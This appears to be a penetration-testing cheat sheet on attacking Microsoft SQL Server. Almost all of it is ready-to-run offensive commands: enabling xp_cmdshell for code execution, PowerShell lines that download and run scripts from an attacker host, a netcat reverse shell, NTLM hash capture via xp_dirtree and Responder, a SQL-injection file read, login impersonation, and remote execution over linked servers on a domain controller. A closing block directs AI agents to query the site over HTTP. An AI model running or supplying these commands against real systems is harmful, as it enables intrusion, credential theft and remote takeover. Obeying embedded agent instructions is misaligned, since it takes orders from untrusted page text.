# MSSQL

## Login to MSSQL Server with SQSH

```
sqsh -S $IP -U sa -P <password>

> EXEC SP_CONFIGURE 'show advanced options',1;reconfigure
> EXEC SP_CONFIGURE 'xp_cmdshell',1;reconfigure

> xp_cmdshell "whoami"
> go
```

Reverse Shell with Powershell

```sql
> xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.x.y/reverse.ps1')"
> go
```

Powershell use <mark style="background-color:green;">Nishang payload</mark>

{% hint style="info" %}
Normally MSSQL associate with Service Principal Name (SPN) in AD.
{% endhint %}

checking the compromised computer:

```
powershell -exec bypass

# import module
. .\GetUserSPN.ps1
```

collect:

* SAMAccountName
* Service Principal Name

MSSQL Auth

* Builtin\Users
* sa (service account)

## Do you have a valid creds?

```
mssqlclient.py manager/operator:operator@manager.htb -windows-auth

# myssqlclient.py <domain>/<user>:<pass>@<full domain> -windows-auth
```

## Enumeration for PrivEsc

### Do you have access to the machine with mssql?

```
sqlcmd -Q "select * from sys.databases"
sqlcmd -Q "select name,create_date from sys.databases"
```

### Using PowerUpSQL

{% embed url="<https://github.com/NetSPI/PowerUpSQL>" %}

```powershell
# download and import
PS> IEX(New-Object Net.WebClient).downloadString("http://<attacker ip>:<port>/PowerUpSQL.ps1")


Invoke-SQLAuit -Verbose
```

## Capturing the NTLM Hash

Make sure you have access to command xp\_dirtree in the sqlcmd.

```
# setup responder
sudo responder -I tun0

# call the attacker IP inside the sqlcmd

sqlcmd -Q "xp_dirtree '\\<attacker ip>\test'"

```

## MSSQL Read File

**Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission.

```sql
-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
```

## RCE with MSSQL

```sql
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
EXEC xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.x.y/reverse.ps1')"


# reverse shell

#power.ps1
iwr http://10.10.16.2/nc.exe -outfile c:\windows\tasks\nc.exe;
c:\windows\tasks\nc.exe -e powershell.exe 10.10.16.2 12345

EXECUTE AS LOGIN = 'sa';
EXEC xp_cmdshell "powershell -ep bypass iex(iwr http://10.10.16.2/power.ps1 -usebasicp)";

# rlwrap nc -lvnp 12345
```

If you need to reactivate xp\_cmdshell (disabled by default in SQL Server 2005)

```sql
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
```

## There is Azure AD and DCSync?

ref: <https://blog.xpnsec.com/azuread-connect-for-redteam/>

```
sqlcmd -Q "Use ADSync; select private_configurateion_xml,encrypted_configuration FROM mms_management_agent"


# download the code as decrypt.ps1 and make sure you change the Data Source.
IEX(New-Object Net.WebClient).downloadString('http://<attacker ip>:<port>/decrypt.ps1')

```

## Check Ability to Impersonate User

```
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
```

```
EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'show advanced options',1; reconfigure;
EXEC sp_configure 'xp_cmdshell', 1; reconfigure;
EXEC xp_cmdshell 'powershell -c "C:\Windows\Tasks\nc.exe -e cmd 10.10.x.y 443"'
```

impersonate dbo (db owner)

```
use msdb; EXECUTE AS USER = 'dbo';
```

Check Linked Server with MSSQL

```
EXEC sp_linkedservers;
# if linked to DC you could query accoss from current sql server

SELECT version FROM OPENQUERY("DC01", 'SELECT @@VERSION AS version');
SELECT myuser FROM OPENQUERY("DC01", 'SELECT SYSTEM_USER AS myuser');

# execute the RCE at dc01
EXEC ('sp_configure ''show advanced options'',1; reconfigure;') AT dc01
EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT dc01
EXEC ('xp_cmdshell ''powershell -enc <base64 powershell>'' ') AT dc01
```

MSSQL query problem with quote, so using base64 encode command is best options.

<https://www.netspi.com/blog/technical-blog/network-pentesting/hacking-sql-server-stored-procedures-part-2-user-impersonation/>

reference:

<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacker-mind.gitbook.io/hacker-mind/penetration-testing-notes/mssql.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.